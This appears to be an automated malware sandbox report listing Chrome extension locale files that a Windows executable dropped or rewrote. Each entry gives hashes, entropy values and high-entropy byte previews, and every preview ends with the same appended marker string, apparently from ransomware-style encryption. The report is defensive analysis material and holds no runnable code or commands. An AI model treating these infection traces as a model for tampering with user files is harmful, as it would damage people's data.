                                                                                                                                                                                                    Preview: ..9....z...g.....?.(.,...Y...5.H..g.._....V.......b....V.!8. .o.P + .1Z....l2D...1..=...O.X.y.J....@W.... .k.,...Xr............s+.....$.q'Y..!`c7A...\>..Rj.;..m.7~...;!..j..m@.fzA:.?..j..6/....m.A..o>.'.f..."..2@h..L...h..GQ.m.{....M..6.;C.....]h.{!..i..aBA..G......$....u.63.[...Cw4....J.....y..[.%...8p....z.r.N '.......d[.].ev..'.PF..v[.....|.uiV...z7...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fil\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):472
                                                                                                                                                                                                    Entropy (8bit):7.442878129466181
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:5pGIUXWxVzGyznjM689ZV/32yzssB3k6bhEca0KfKpRoPcii9a:5pGIUGvzGyPs3myzsw3kmr2FPbD
                                                                                                                                                                                                    MD5:D92A15F5A6F2C92413432E26E4C75F6D
                                                                                                                                                                                                    SHA1:FD5B12730E4851F13B1D567F92DB70CCC82C862A
                                                                                                                                                                                                    SHA-256:F0CEE0DC44C0E7A315E7AD9FEFAA0D5227E1FA92E3EC2D95592E6AA4F5DE8527
                                                                                                                                                                                                    SHA-512:1C105B6FF09F8231260690BEE86DC4288FCF3BBEACC48C95AC72EAA952942013A4B6CDBF7E995B4CBA7A902B945587A0B57131978F95BE9CF23EC6C06D8F5DFA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 1.6.Bvv.:.vo.V....y~..M.b..n.u....#.u...I.}.eUk.U....qcX.......8..T..!.....Z.?u.)...W.j.p..8.Fq,..A.p.....>....i.L..F..x..!...1.NZ..#.v.R..fq%]....Ps.xR....d.(YH.P.l...u.2{..Z...w.vX.h...Q.g...nf.*.....1........Q3'x....Z)D...|U...Q.#...y..R........3.5...\l.st.x5W.......y;..<LpO..*QM.......B...C....>..B.G...[SDr........r...bV1jw.t........1..#....'.a.1L.....0R.}5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fr\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):467
                                                                                                                                                                                                    Entropy (8bit):7.411696455312592
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:4qg+VYeOIHFCIhaOdh9czQ050NYdyO8cii9a:lgNetkghdHcTtp8bD
                                                                                                                                                                                                    MD5:DDAD828B6B33A6B9DC60B6BE1C71F62E
                                                                                                                                                                                                    SHA1:44D2FCD8EB0651ADD6C50B30345C82F69634E713
                                                                                                                                                                                                    SHA-256:3B3269EC6016E682B0925E8BC84E25DFBAF8A308004803A75C8E2B57A5C1909C
                                                                                                                                                                                                    SHA-512:E1AE0505A969C2F482BEE4388B5AF211BDCDE74C41E30320CF8D3654BAAA1D63B0116E166CE2821C580FDDB0E9FC8ABC03F5656B5D17EB683E8302304CA4CF49
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: U(...x&....^.7.O.[[..<...o.-.*.({....2....Lf...m&)k-..L...=v._..l....;.{./...'6&...C.A..9*o.................X.C..N.{.&uN.36\........".Ly.(...v..@(...Y...-y..g&.....x/...].{~.-..iV[L..zP]....<..0+..."A.F./o..+R.JNB.....`..M.......e.\..F.jR.n.a...........3...m..]...L..Qx0@..tk...B....s.}H.Jg..}...\s5..............7....&..Q..:@w..=......|.2E.fo.4A.....a3...Y.......5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\he\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):469
                                                                                                                                                                                                    Entropy (8bit):7.436936664946949
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:oOnLwYIZBmFgGNE9tovcZ/P86whqIgIbsPlL5akXcii9a:otYD2o2clJgs2akXbD
                                                                                                                                                                                                    MD5:31CF1CF36C39787972172ABA875C0DAE
                                                                                                                                                                                                    SHA1:F6FE5F6E7D390E06B11899176848306C4695539F
                                                                                                                                                                                                    SHA-256:6CAAF64AC6AEC18D05FF8400B8C249249CFE6FB27881CCBA74D747D7E67AFC71
                                                                                                                                                                                                    SHA-512:FF690B6CB8BDDC065A4BE944A171CFFD83B48B09E008498ACF5A6B28EE2219B6F5F4AD526C78117F805DCA4F5B6C2E089E1C02D856FBDD586C927141944629BB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: d.]Vz..w....v......BJ.S....}u.o..~.......5...3.....Y..6`L6..rV;...?.Oz_\..c.C.MD........=i.Cj.<<...7.S5LZhB.....Ts&].,\2O..uj..A>P......c_.{..qf..)..mB.;EL_...t...+_,"......,A.T.c)eR.....WJ.h..r..[v.^..Gu..D....q.@'`.]..~F.ri.P...Z.zS.Z...\...=....C...$...w.....Q..=...=.K.T...\.....@.a@...~....E....&.L+.o....4:.)dV.\...L.F=5...>.l.."...DNg...<Hh. 3N.,<..}H....&`....*.2.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hi\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):546
                                                                                                                                                                                                    Entropy (8bit):7.5794250131720675
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:YCBDONNY1N76oIJ61M0PCxq42ZSuGiFMQuqZvXcii9a:HINN6NRIk1fCxq49ulyBKXbD
                                                                                                                                                                                                    MD5:D47BC36745F3BBE90EB6FABFF52EEE4E
                                                                                                                                                                                                    SHA1:53E1CFC92DA4F4E049A337A2D7635D5750EC3C47
                                                                                                                                                                                                    SHA-256:533AAF593EF30AC61E573C52241AE20DF8E103663FED7B9C81D0763214B82F69
                                                                                                                                                                                                    SHA-512:FABC77839572539E201345FB37853E5D2AC34B72E18103832A4B77C6D66A2693DF78A862BA213900BD35FCC4F984FEF48CB2BC599D964B3D8B4FCF41F59653BE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .x...c.=.;&(.[[3a.yv....z.....B....s4Err.q.]..P.(.@....Z..E...|xd.B.Tm...t.,.X.q..<.....-.<.4%E.I..d...l.......r.Lw.O....o.k..`u.U."....26..]...#..zk.......qG:kr..~.&..\..Mr|W...4P..;.._...\..r.$...(s.b?.|p.D.b...a.O......H..R....:.a..(...u.................Xh....tD.O..8.A.........sY..8.?....-F...p.....F.M).....T..*..-.Y8C=...)3....0...fi.../....vl~O.....2.M.?Y..8i.:j...v?R...6|../4$l.v4.....MG...7.[...-h....#, ..G..r.OJg`.D+....n5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hu\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):475
                                                                                                                                                                                                    Entropy (8bit):7.460539956160306
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:xA3su8JCGPGrhOHEgFIho6h4P7lfG5cii9a:W4JCIGrJ8IhoC4P7GbD
                                                                                                                                                                                                    MD5:E0139473607117C9B4C04B741B0628D1
                                                                                                                                                                                                    SHA1:BCA168752C3E7E3DE414F99B8893D9D1F446321E
                                                                                                                                                                                                    SHA-256:B8E7C093B10E74AF50FE7EBD907D62DCC88153E17CE8307E288B62304E5EECB3
                                                                                                                                                                                                    SHA-512:A7DC7DF97545AD18E9F49666187B0F9470DCF8CBFB3E580B6AF6800938C0880366CED01A9BF8B8B49733D1F5EF7EFEC61E8C31C130B6402751024E2FD43DE387
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......0o)..A5...O`.Gz...]_..F.J.5...M.U..M.@8...Y..o.A....F.r.....%.../.6.....X......E"Nn..M.)[..../F.0*.}.y....Y:......$....w.r$W......+_+I5...Q..wO.;.Y..p^..Y..T.e.L0......v..d._.ue......^......Q.\.o.13.".^).Bp...Ru......i.TS....J.3...@..,;t..{.@./V...$....:.......M.9...c.T@.n...T.?N.....@+>...s.....%24.W.m..s.i.%("Ax.oc......#.H..b....G.....0..c.q.[....\%&.Z.*....Q9U/.9.T.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\id\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):460
                                                                                                                                                                                                    Entropy (8bit):7.374513420334516
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:xSisYx0ovcbpiJzQySvArcuSmsaImdtBs3HsBbBd4ERf5gF58cokyal1+Lmai75A:xSijDvYiJ+u/Jw8HzR++coGwmUcii9a
                                                                                                                                                                                                    MD5:EC74D6CFDDAB3B4819C4A6021061B722
                                                                                                                                                                                                    SHA1:012B37138715FD5ABCD165EE3E30CC945C025CFA
                                                                                                                                                                                                    SHA-256:6F345C1800A5362983156B1F6BD6ECDB04CCC59AF3533CF1471BEB68BB3BB34D
                                                                                                                                                                                                    SHA-512:866F7A9B518B13FD483EF6861FD1E6BF49D47E2C9AF02FF9306C3F89D3CEF28B9D92C52C63A93CA540687DD79F71857BD800262C873B5F55D6399AA63AF3297E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....t...Z$....^7..B./..Z.(f.........-..j.1B.).'C.@t.1..73,P....q.8.e..9..B.vq..Q..Q.H...C.n3T....B4..r.w..5..>I1.(!+... V....6.on...dD.0A...<`.......5 ...%..b?.}.L..V>.....k.iq.r......r.O....G.&.....6.C.i!...f.OK&]..7.Z......5.k..Dcgr3!._.<.........&.&.D]j.e.$.'.U....).e.D_)JwG.KLCz.x..../..V.S`....{wA..b!PJ0..!!.L.w..=......!.........5.w...s$.|.L.....&.(.#.c.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\it\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):466
                                                                                                                                                                                                    Entropy (8bit):7.395311387561092
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:QgO0nbWWMTMbCCcfXaURTLIDtZ7MGfcii9a:f3adMSPaUxUDtGIbD
                                                                                                                                                                                                    MD5:7CB21B3A717EBFE83A64B3BEC6C4F0C9
                                                                                                                                                                                                    SHA1:35869A796A11A1DD5EE5936B3615BD6BD370239B
                                                                                                                                                                                                    SHA-256:1427D210588D65D06CFC403F26C285BA414C53BA1C530E6016EF6178D5C6E881
                                                                                                                                                                                                    SHA-512:B4A920B1E724D595939D000BA6D180E7B96CB5D4DEC83144B302CD7F828B07821E64F45E5CD8A2776714C0F139F1C8FD7009328E37E8798CED66EBD9A6649A16
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .q ..h~.`.|.k..(A...2.<.._.-.......n..Q....W..n...|.W...Tn|.CC!..S..~4].... 6d..4S..-l>..k...........+-U....v. a4.....jQ.9e. ..9..rT..R5{.b..|..........ne:,.......$z6G7.........P..E.i.....A..tO.k-t.g.b....!..+S%m.....e...a...-"...E:k.\.....Jg...%HO\..`.V....Rk.L...XQP.N..XCb...U.7.F.g.|..1;..$+.&.w...CL:.l.5.....k#.6F.......q[3...")..].=f.A._....Rh..2..`...[p.7r8.W.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ja\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):487
                                                                                                                                                                                                    Entropy (8bit):7.509764451264257
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:jEnYtmbKVQR/q3ir8FKzjqunPFy/WemXcii9a:gnKaKhPFcpuwbD
                                                                                                                                                                                                    MD5:CC37B94C56C2CD8FE842727C0F2DB15C
                                                                                                                                                                                                    SHA1:7AD53FAFEC6674FAB2AAC347ED23AA8DCAC563C0
                                                                                                                                                                                                    SHA-256:8E16BFEB73D652C8C245B8E8BECDB9592BF5A640255AE2B49B5B2B67BC89FDE0
                                                                                                                                                                                                    SHA-512:A5E9EF8CF7B7AF253350DF5ABBEDB81E89FCC2946A0090D202990D857F5A054AF1E1D67294513AC791CCBCF6B874B64659818ED8BDF34E45D128C7AA509733C3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...u.{;.^.z.....%.('a.....c....w......r..B.P....S...5.83........ ....iV......0=..P/.....<(.HG..y..qJ...2Y.6.Nc........W.."......{......D...P.O_..*q..Y.a..5...R...J.......j...X|.-.y.).&{f.$9..wM.fI.8.|...<.h1.....;..O.>........@..h.Y........n....._.X...t.In..3....f.3S..q0.....b...z0..@..O.@.(D+...f..]N..i......[..'9._..b..u5.3l...Z.;\<...`Ox.''.. .x.u'3.....\.k..A...e...2..8..ti.....l5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ko\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):481
                                                                                                                                                                                                    Entropy (8bit):7.503664525735776
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:A0c1cX/JEMXHGgejo7GBrDHEWeMqtHwcii9a:A0tX/JEM3GgejWSZeMqpwbD
                                                                                                                                                                                                    MD5:D39E713755E90A317D141987D1389B6C
                                                                                                                                                                                                    SHA1:834AF3C5774C314044A7C046566EDA81D76D4EB3
                                                                                                                                                                                                    SHA-256:347B5EE855D3341CC5254D02BC5BD55C3D23E2E5B84EE410D0D690F193A0BE4A
                                                                                                                                                                                                    SHA-512:8CC2B665DAEB7E455C18D12C1A08CF1CB8AD954CBB929A3FA16CE82877BE0D4D2C152DE492C679EFD6AE1320735563FFD4F084681774E4C13E032994ABA17D0F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....9...*:.lq.`m{...>.M..wLS.J..d..I.=.......1(.z|.........J....S*j...\q.A.).z....1._.W3.Yp.+V....Q...J...u..u.8p..&-.{..wr..7r.@.....AO=%..H>...`...|4..W;..Y...w.......Ba....b...ucq...k_D...H@....~.J...P...E........z..j....Rc).RE)....:...b.F....0Th....W6.....=a%!.>c....X....x<...BN.NJn\s........%lZc.|pp....f.p<.S.p.D..(.v..~*L...)..nr.$a.T.._V.?!.V/...OTA....n.....`..z..'6.i...x^...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lt\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):467
                                                                                                                                                                                                    Entropy (8bit):7.413595690673307
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:k+2y3wU+LdyCLOX5eAGB4bKrO2SsR/et6SfXcii9a:k+LxWOpyB4UR/e/PbD
                                                                                                                                                                                                    MD5:532ADE9BB295D191DE08847A8998615D
                                                                                                                                                                                                    SHA1:82BADC66C19FFAB422E32576BCDB33C8AA5D1D18
                                                                                                                                                                                                    SHA-256:E1B1BC99DDD3F69CDD5CB79EA09F83723B400D5F991FCE09CDC7D8962036C7FA
                                                                                                                                                                                                    SHA-512:E7D6E02ECA5BC261FDC2A9CF6BA148D08B1C93F3473010CB0E039EC404FDCEF08BD34595480A42786776D60F64181256B960652B52926D9EC6F0F89FD378B7E2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .o........VK..5.06.....g..."....z.2.>..@.H.GM.@..=.&"..;.`...P.vw.;'..%].z..u.lu8...iH5.]....t.oB9.1._.&....-.c...v....#.NE..V...H].@)r.1..........{.^.,....gZi...S..wY..j..).arr..I...{...1E.n......].....4.u..........'?.Zh.M#;..D.......(.V...:.Z...A.|........h..B8T.\Z.1_....&V$.3.._7HCH....}.O^5m9.i..s..p..+<..=.n..K1PP.Z.. .~...n...........t.n..A.V.....<......L.M......$5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lv\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):479
                                                                                                                                                                                                    Entropy (8bit):7.438776412907234
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:c2qgWXnqPsFLwGsOWF9kEGqdxSmRvcii9a:cRXnqPIUvLSrmZbD
                                                                                                                                                                                                    MD5:519003A0DCFF93EBC55521742D10F5FF
                                                                                                                                                                                                    SHA1:9599C7C4B0CA9C8A08389DD1E31F9FB3F09A7EAC
                                                                                                                                                                                                    SHA-256:7DA831C724FA5FCE357D477CB1D87E65CDDF9FE530510B26C1BD171AD76DEDA6
                                                                                                                                                                                                    SHA-512:CFCF8E40835E40A8F433F5316C2D78F76426D21AC07D3EA655898D86DD998ACFCC59F7ED3BC63C73904DA9A980627E20F995A67EEC1F5F894D7E771C9A6EC5F2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...X.&..T .b...!r...1.p.......ebL+*U.aTA.-.I.!..4.1.C.A...y8....w...E..x[.o...XA.Uz..Nv..z.......Y............=.,.PW.../.....w.V.M:wx*....*..{F.NJJ.Ru..c.....E.b...u...m..Yr....y+.xt5..5O..G)<.~&2.Mc....T..fX.gEF.....kW.DC..hP..(.F.`M..Z..X.vi..]bf.'..V.."...FZKWT[...d.......:7//H......<.....M......-..O...m..F..Q.5.F.a.:..j............O.jf.U .8q...R.6r.P.|5^x.h.2.LoS...{n..i..=.{.3..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ms\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):455
                                                                                                                                                                                                    Entropy (8bit):7.432080148593085
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:xrDsKNOlFz9G/mA8CJhlhxtgJW1Ki7uXbfAdvplquqmEpkxYtcii9a:xrDsTFzk/m9Cz/xtgJ4SXMplvqmewQbD
                                                                                                                                                                                                    MD5:C1CC4AC6B845D36FB7BE9ECFD7D9349E
                                                                                                                                                                                                    SHA1:C8B9869838A1AD901528E825E4C8E1211626EE53
                                                                                                                                                                                                    SHA-256:60DA74330C4CA2563C07EF2250D8551BD4538F9633C95186ECDC13A58FBB877F
                                                                                                                                                                                                    SHA-512:EF67009FDA1750910D4B67AF96338D1B4B356C1625782C3E55BE2BA953AA92A8B7E4E917E77A6DE2142C162CC7247F1A9B238793603D231480D6D9B9BE21E763
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....#D&g.L..".D..5..%.!A;.4.k..[.......7D.G,.F...[.\.2.......9.h.`!B<.....m.y..Gdf...#Z....y..-6n./w|..[.. IW.P..z.|.......C...W...T.W..(....X......I.g...N...q....=...BO..(..F....y..N.....0..v+.r2.#...`.l#&..j...:T.l...#},.j.Y.....*~..\..........)X.7N4.c..?.+H.A..?.0..l..}......V.e...a..R..G....L..N.T"..}F.....B^...?.sx:.v\g..;..>.E.m.X..V..,8...(..Cc4.j.?..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\nl\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):466
                                                                                                                                                                                                    Entropy (8bit):7.4174627157101485
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:HJaM7VpjkvhlrCBsDERHfqqa56Ds27aXcii9a:HJh7TUzWuER/q52sZXbD
                                                                                                                                                                                                    MD5:860A625DA4688A2C3B0C306C1763799C
                                                                                                                                                                                                    SHA1:52965EA539DA993C25936190D1575D956531D53D
                                                                                                                                                                                                    SHA-256:278492A335CA0D6B570B08AD2AB07878DF4DF263D516A80354DEA673CB6FBB10
                                                                                                                                                                                                    SHA-512:07C729EA2DBCDCFCB8D1DFD7C918E57828BCF7F56EA3BD16451F6345EEF5723B7FFE0FC7B704853451CBF5AEB97EADC9AEBE6DF2E08BD993115B44EDAAF69045
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: c...'...aG...dG.+5t....w-.}....0..kc+....G&..}y...i.)qi.[.c.{...,%M........$Aw....A.o2.Y.o....c;.......t....>.........$...d..'...d..*.2....E....,.}M-.u..=j.g;._}4xO....7`..g.#.n..mPy....V.....<u.\h......pCB....T.....5.......b......$...OfY.,.W.M... ..}E..SL.H.7|Hm....cG.h....@.5V.....B.x..A`p.|p.k.;.l.@..f..ai.T.N...qB0..~...^Nd...kI...`.J.....s..78...HT...r.Q.jp..}..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\no\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):428
                                                                                                                                                                                                    Entropy (8bit):7.399565704132723
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:geNVm6dYKhfvwAq6a2OpcIJDPwamzmcii9a:gqmzKNux2Op5JDPwaEmbD
                                                                                                                                                                                                    MD5:0E39760A221773AD3F22B7ED20CB0602
                                                                                                                                                                                                    SHA1:E47C1ECC0D9A0AF414AFA532A7E3E0035403A086
                                                                                                                                                                                                    SHA-256:26AC5FE342A8BE0D912AFD8888D52329EEB3228E3939E9FDB03F86C586D38F9A
                                                                                                                                                                                                    SHA-512:C8FA9EC0B1D0EF42DA0AD230D824219619E8F8B9062CC0FDDCF53C95BEECAA370890F59FB45968ED8A807F7AE08A097599C9A2BA233E8B0C4B4D2789B5696FC6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..E..L..vG.{?N... ....I...98.*"H......h[....YVE.In}..C....a...co...........l...t.....7k.w........w5.Y..C y.T. X`:c.w7p.....\.W...n..=o..@-..V!..*..)]$.......!...d.U.c.x..`..o>R.d[.)xmb?.-..k0e....|....h.M...s6mKc.%5.a.:g.z.~.0.t.j.....(.\2j`.5..b~l...`.., .%,>..6.....o.FQ...0....p.tC.[N....z..v...m...`.T.....2.......V....)...wc5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pl\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):469
                                                                                                                                                                                                    Entropy (8bit):7.448499944270113
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:NrJG86qSallPEuWsEMT6Z3akxT4housbLDJg270WIcii9a:NrJGnqTPxErfxTNxLVgfFbD
                                                                                                                                                                                                    MD5:7971DBF1D5979BCD3A565825D484B443
                                                                                                                                                                                                    SHA1:AE41C1B842028923188AF66D2771AE7F192DBEA6
                                                                                                                                                                                                    SHA-256:FADB9078183423AEF895193A21E8DABD901E90D67ED14B0C347B53E2E97A8502
                                                                                                                                                                                                    SHA-512:897C991C647AF4F988B1AD415CBB1DF27AC66E143BB17B828D7E0DE08C23C616AEEE247C563DFD55B13E54A04C952BD9E7C915EC1F4215EB339B7CF852B5B68D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...H....|.IJLa..n..d..=..q..I.o...0....2..v.}`.......q.e...!..1.d..E?k..J.#.$..gq..s}.E..."...FS.X.J...vig.P....=n.^.]..9...!n..N.(....p....?.wAe..Il..&.N}.........Pi0....v.75 ..A$....m.t...b...!....0..!.0.A.>.>.....2>i.{.iK...bjS#.g.c..m^@.y**w..i..-...0R.o.q1..mN.TO.l.y...N.vW .e.)..Z.@x&'s.I.....w..lB_.8........J~.:.2.......].&u..+[/...jo..X..d.e.F...-A.O].2.......5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_BR\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
